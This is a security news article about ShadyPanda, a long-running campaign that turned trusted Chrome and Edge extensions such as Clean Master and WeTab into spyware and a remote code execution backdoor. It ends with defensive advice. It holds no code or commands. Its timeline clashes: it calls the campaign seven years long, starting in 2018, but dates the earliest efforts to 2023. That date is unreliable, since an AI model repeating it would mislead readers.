A seven-year browser extension campaign has infected 4.3 million Chrome and Edge users.
The group responsible, tracked as ShadyPanda, has been observed leveraging trusted browser marketplaces to build user bases, operate legitimately for years, then quietly deploy malicious updates.
A new Koi Security report identified a remote code execution backdoor affecting 300,000 users across five extensions, including Clean Master.
These extensions had operated normally since 2018, until a mid-2024 update enabled hourly downloads of arbitrary JavaScript. The malware logged website visits, exfiltrated encrypted browsing histories and gathered full browser fingerprints.
Meanwhile, a parallel spyware operation reached more than 4 million users through five additional Microsoft Edge extensions, most notably WeTab, which alone accounted for 3 million installs.
These extensions collected every URL visited, search term, mouse click and various browser identifiers, with traffic routed to servers in China.
Origins and Longevity Strategies
ShadyPanda’s earliest efforts date back to 2023, when the threat actor launched 145 browser extensions masquerading as wallpaper or productivity tools.
These add-ons injected affiliate codes on several shopping sites and used Google Analytics to profile user behavior. Koi researchers said the campaign revealed three lessons ShadyPanda would later exploit:
-
Limited post-approval monitoring
-
High trust in extensions with strong install counts
-
Advantages gained through long-term legitimacy
Read more on browser extension security: Researchers Reveal 18 Malicious Chrome and Edge Extensions Disguised as Everyday Tools
By early 2024, the group shifted toward aggressive browser manipulation. One extension, Infinity V+, redirected searches through a known hijacker, harvested cookies, and transmitted keystrokes to external servers.
Although many of these extensions were removed within weeks, ShadyPanda kept on developing its attack strategies.
Koi researchers attribute ShadyPanda’s longevity to a consistent gap in extension review processes.
“ShadyPanda proved that marketplaces still review extensions the same way they did seven years ago – static analysis at submission, trust after approval, no ongoing monitoring. Clean Master operated legitimately for five years. Static analysis wouldn’t catch this.”
To defend against similar threats, individuals are advised to routinely audit installed browser extensions, remove tools they no longer use and favor developers with transparent update histories.